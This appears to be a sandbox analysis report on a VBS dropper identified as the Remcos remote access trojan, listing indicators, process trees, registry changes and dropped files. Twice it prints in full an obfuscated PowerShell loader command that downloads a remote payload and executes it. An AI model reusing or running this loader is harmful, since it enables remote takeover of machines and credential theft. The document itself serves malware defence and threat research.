File name:

Reqt 83291.vbs

Full analysis: https://app.any.run/tasks/7e0868b4-c32c-4b8e-8849-44ccaf0ff479
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: December 11, 2024, 09:44:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
remcos
remote
evasion
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (350), with CRLF line terminators
MD5:

67552A3CC2641AD2C640148836475C97

SHA1:

C35AE8937BBD48525C521FDB33AEF88A1399BEC0

SHA256:

EF0695BDD5F43136BE86281B48A318C29B7D18268CCA5E1956EFF46EE655F858

SSDEEP:

1536:c/tTURy7UcHIBKNgJSxnsUlJkCwkHKPncWf5:axUkZIBxAxs7KK/cWx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 6500)

    • REMCOS mutex has been found

      • msiexec.exe (PID: 3080)

    • Steals credentials from Web Browsers

      • msiexec.exe (PID: 4932)

    • Actions looks like stealing of personal data

      • msiexec.exe (PID: 4932)
      • msiexec.exe (PID: 6592)

    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 3080)

  • SUSPICIOUS

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 6420)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6420)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6420)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6500)
      • powershell.exe (PID: 6092)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6420)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6092)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 6092)

    • Application launched itself

      • msiexec.exe (PID: 3080)

    • Contacting a server suspected of hosting an CnC

      • msiexec.exe (PID: 3080)

    • Connects to unusual port

      • msiexec.exe (PID: 3080)

    • Checks for external IP

      • msiexec.exe (PID: 3080)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6420)

    • Manual execution by a user

      • powershell.exe (PID: 6092)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6500)
      • powershell.exe (PID: 6092)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6092)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6092)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6092)

    • Checks proxy server information

      • msiexec.exe (PID: 3080)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
11
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs #REMCOS msiexec.exe msiexec.exe no specs msiexec.exe msiexec.exe msiexec.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3080"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
3508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3832C:\WINDOWS\System32\msiexec.exe /stext "C:\Users\admin\AppData\Local\Temp\hkcsarcho"C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
4932C:\WINDOWS\System32\msiexec.exe /stext "C:\Users\admin\AppData\Local\Temp\hkcsarcho"C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
6092"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6244C:\WINDOWS\System32\msiexec.exe /stext "C:\Users\admin\AppData\Local\Temp\uhmvccycqbazniv"C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
6420"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Reqt 83291.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6500"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\microsoft.net\framework64\v4.0.30319\wminet_utils.dll
6508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
6592C:\WINDOWS\System32\msiexec.exe /stext "C:\Users\admin\AppData\Local\Temp\jnhdbknactiv"C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
Total events
6 339
Read events
6 333
Write events
6
Delete events
0

Modification events

(PID) Process:(3080) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-D98D6X
Operation:writeName:exepath
Value:
91909EC442DAEFF27ED62741C5DA4CF1CADCD27D8AA2DD556DF20CD743E163ABA539B11B1B602833E13F5A5FB79C58737771F56D7A40B1D1C485A74302AF6A47
(PID) Process:(3080) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-D98D6X
Operation:writeName:licence
Value:
A4A57FC586694818E183EE2DC7BB8A96
(PID) Process:(3080) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-D98D6X
Operation:writeName:time
Value:
(PID) Process:(3080) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(3080) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3080) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
0
Suspicious files
7
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
4932msiexec.exeC:\Users\admin\AppData\Local\Temp\bhv27D9.tmp
MD5:
SHA256:
6500powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_exr5eaax.5m1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3080msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:67E486B2F148A3FCA863728242B6273E
SHA256:FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB
3080msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:971C514F84BBA0785F80AA1C23EDFD79
SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895
6092powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
3080msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:0283244A25AE0071499EECA569CA9066
SHA256:C6FC8133F887C4255BD8B6F71809E529317E1D36DF625ADDB6A2D92C8F4C699F
